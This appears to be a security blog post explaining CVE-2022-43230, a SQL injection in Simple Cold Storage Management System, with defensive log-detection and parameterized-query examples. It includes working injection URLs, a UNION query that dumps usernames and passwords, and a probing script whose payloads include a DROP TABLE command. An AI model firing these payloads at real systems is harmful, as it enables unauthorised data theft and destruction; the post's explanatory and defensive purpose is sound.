Security and data privacy are critical for any business, even more so for those handling inventory and logistics. The Simple Cold Storage Management System (Simple CSMS) v1. is a popular, open-source tool used by small and medium-sized businesses to manage cold storage bookings. But if you haven't patched it, your system could be wide open. This long-read breaks down a serious vulnerability, CVE-2022-43230, that is trivial to exploit and can leak your entire database.

Let’s unpack what went wrong, how dangerous it really is, and how attackers can use it to compromise your inventory data.

What is CVE-2022-43230?

CVE-2022-43230 is the identifier for a SQL Injection vulnerability in Simple Cold Storage Management System v1.. The bug is in the file /admin/?page=bookings/view_details, specifically on the id parameter. By sending crafted data in the URL, attackers can make the backend execute their own SQL commands. This means reading, changing, or destroying data without needing to log in.

Why Does This Happen?

It’s a classic security mistake: user input isn't validated or parameterized before being concatenated into SQL queries, so the server executes whatever it receives as part of the query. That’s an open door for attackers.

Here’s a classic, simple piece of (unsafe) PHP code you might see:

<?php
// ... connect to database

$id = $_GET['id'];                                   // raw, attacker-controlled request value
$sql = "SELECT * FROM bookings WHERE id = $id";      // value is pasted straight into the SQL text
$result = mysqli_query($conn, $sql);                 // whatever arrived in the URL is now executed as SQL

// ... rest of code
?>

Notice there’s no validation, no quotes, nothing. If you send id=1, it works. But if you send some sneaky SQL — like id=1 OR 1=1, it will return *all* records.

Let’s say your admin’s URL looks like this:

http://target-site/admin/?page=bookings/view_details&id=5

If you changed the id value to inject SQL:

http://target-site/admin/?page=bookings/view_details&id=5%20OR%201=1

This changes the SQL query on the server to:

SELECT * FROM bookings WHERE id = 5 OR 1=1

The OR 1=1 part is always true, so the WHERE clause matches every row and the page returns all bookings instead of one. The same lack of filtering lets other injected SQL reach other tables and dump sensitive data.

Try seeing if the error messages change, which is a good sign of SQL injection:

http://target-site/admin/?page=bookings/view_details&id=5'

Or, to dump usernames and passwords (if the query isn't limited):

http://target-site/admin/?page=bookings/view_details&id=5 UNION SELECT 1, username, password, 4 FROM users--

Warning: Only test on systems you own or have permission to test. Hacking other people's systems is illegal.

Here’s a simple Python script to automate finding this flaw:

import requests

url = 'http://target-site/admin/?page=bookings/view_details'

# The first entry is a normal id and serves as the baseline; the rest are the probes discussed above.
payloads = [
    "1",
    "1 OR 1=1",
    "1' OR '1'='1",
    "1; DROP TABLE users;",  # Dangerous if it executes, for awareness only
]

for p in payloads:
    full_url = f"{url}&id={p}"
    r = requests.get(full_url, timeout=10)  # requests percent-encodes the spaces in the payload
    print(f"[*] Tried {full_url} - Status: {r.status_code} - Body length: {len(r.text)}")
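On the defender's side, the probes above leave a clear trace in the web server's access log: requests to the admin booking-details page whose id parameter is not a plain integer. The following is an added example, not code from the original post or from the CSMS project, that parses constructed combined-format access-log lines (the addresses, timestamps, sizes and user agents are made up for this example; only the endpoint and the probe shapes come from the post) and flags every request to /admin/?page=bookings/view_details whose decoded id is anything other than a decimal integer.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache/nginx combined format). The traffic is invented
# for this example; the endpoint and the probe shapes follow the post.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Oct/2022:18:20:01 +0000] "GET /admin/?page=bookings/view_details&id=5 HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Oct/2022:18:20:07 +0000] "GET /admin/?page=bookings/view_details&id=5%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Oct/2022:18:20:09 +0000] "GET /admin/?page=bookings/view_details&id=5%20OR%201%3D1 HTTP/1.1" 200 98211 "-" "python-requests/2.28.1"
203.0.113.10 - - [28/Oct/2022:18:20:12 +0000] "GET /admin/?page=bookings/view_details&id=5%20UNION%20SELECT%201%2Cusername%2Cpassword%2C4%20FROM%20users-- HTTP/1.1" 200 6110 "-" "python-requests/2.28.1"
198.51.100.7 - - [28/Oct/2022:18:21:00 +0000] "GET /admin/?page=bookings HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Oct/2022:18:21:03 +0000] "GET /admin/?page=bookings/view_details&id=12 HTTP/1.1" 200 4090 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTOCOL", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# The only legitimate shape of the id parameter on this page is a decimal integer.
ID_OK = re.compile(r"[0-9]{1,18}")


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes the values, so "5%20OR%201%3D1" becomes "5 OR 1=1".
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_suspicious(log_text):
    """Return one record per request to the vulnerable page whose id is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != "/admin/":
            continue
        if rec["query"].get("page", [""])[0] != "bookings/view_details":
            continue
        for raw_id in rec["query"].get("id", []):
            if not ID_OK.fullmatch(raw_id):
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"], "id": raw_id})
    return hits


def count_by_source(hits):
    """Aggregate flagged requests per client address, which is what an alert would key on."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    flagged = find_suspicious(SAMPLE_LOG)
    for h in flagged:
        print(f"{h['ts']} {h['ip']} status={h['status']} id={h['id']!r}")
    print(count_by_source(flagged))
```

Run against the sample, the three probe lines from 203.0.113.10 are flagged and the two normal lookups are not. The same check maps directly onto a WAF or log-pipeline rule: on this endpoint, an id that fails `^[0-9]+$` has no legitimate reason to exist, so the rule has essentially no false positives, and a 500 response paired with a flagged id (the single-quote probe) is the strongest signal that the injection actually reached the database.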

Sources and References

- NVD - CVE-2022-43230 Entry
- Exploit Database - EDB-ID 50994
- GitHub - Original CSMS Project (archived)

How To Fix CVE-2022-43230

The best fix is to never trust user input and always use prepared statements or parameterized queries. Here’s a safe version of the query:

<?php
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM bookings WHERE id = ?");  // query text is fixed; "?" is a placeholder
$stmt->bind_param("i", $id);  // "i" means integer: the value is sent as data, never parsed as SQL
$stmt->execute();
$result = $stmt->get_result();
?>

Or, at the very least, cast your input:

$id = (int) $_GET['id'];   // anything that is not a number becomes 0; "5 OR 1=1" becomes 5
$sql = "SELECT * FROM bookings WHERE id = $id";
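To see the unsafe query, the prepared-statement fix and the integer cast side by side in running code, here is an added example that is not part of the original post or the CSMS project. It uses Python's built-in sqlite3 module against a constructed in-memory bookings table (the table name and id column follow the post; the other columns, the rows and the function names are assumptions for this example), so it runs offline. The concatenated query returns every booking for the input `5 OR 1=1`; the parameterized query returns nothing for that input because the bound value is compared as a whole and never parsed as SQL; and a strict integer check rejects the input outright, which is preferable to a bare (int) cast because the cast silently turns `5 OR 1=1` into 5 and hides the probe from your logs.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the CSMS bookings table (columns and rows are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE bookings (id INTEGER PRIMARY KEY, customer TEXT, pallets INTEGER)"
    )
    conn.executemany(
        "INSERT INTO bookings VALUES (?, ?, ?)",
        [(1, "Acme Foods", 12), (2, "Polar Fish", 4), (5, "Frost Dairy", 9)],
    )
    return conn


def view_details_vulnerable(conn, raw_id):
    """Same shape as the unsafe PHP: the raw request value becomes part of the SQL text."""
    sql = f"SELECT id, customer, pallets FROM bookings WHERE id = {raw_id}"
    # "5 OR 1=1" is parsed as SQL here and matches every row; "5'" raises a syntax error,
    # which is the changed error message the post describes.
    return conn.execute(sql).fetchall()


def view_details_parameterized(conn, raw_id):
    """Same shape as the prepared-statement fix: the value is bound as data."""
    sql = "SELECT id, customer, pallets FROM bookings WHERE id = ?"
    # The whole string "5 OR 1=1" is compared with the id column and matches nothing.
    return conn.execute(sql, (raw_id,)).fetchall()


BOOKING_ID = re.compile(r"[0-9]{1,18}")


def parse_booking_id(raw_id):
    """Stricter than PHP's (int) cast: reject anything that is not a plain decimal integer."""
    if not BOOKING_ID.fullmatch(raw_id):
        # Rejecting (and logging) is better than casting "5 OR 1=1" down to 5 in silence.
        raise ValueError(f"invalid booking id: {raw_id!r}")
    return int(raw_id)


def view_details_validated(conn, raw_id):
    """Validation plus parameterization: the combination to ship."""
    return view_details_parameterized(conn, parse_booking_id(raw_id))


if __name__ == "__main__":
    db = make_db()
    for raw in ("5", "5 OR 1=1"):
        print(repr(raw), "vulnerable     ->", view_details_vulnerable(db, raw))
        print(repr(raw), "parameterized  ->", view_details_parameterized(db, raw))
        try:
            print(repr(raw), "validated      ->", view_details_validated(db, raw))
        except ValueError as exc:
            print(repr(raw), "validated      -> rejected:", exc)
```

Parameterization alone already closes the injection; the validation layer is there so that a probe becomes a logged, rejected request rather than a query that quietly returns booking 5. The same split applies to the PHP: keep the prepared statement as the real defense and treat the integer check as the place where you notice an attack.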

Final Thoughts

SQL Injection is an old bug, but it keeps coming back, especially in free or open-source business tools. If you’re using Simple Cold Storage Management System, check your version and patch it now.

Got this vulnerability in your stack? Avoid a data disaster: fix your code, change your passwords, and scan for other weak spots.


*This post is for education and defense only. If you’re an admin or developer, take it seriously and apply the patch. Hack responsibly and stay safe!*

Timeline

Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC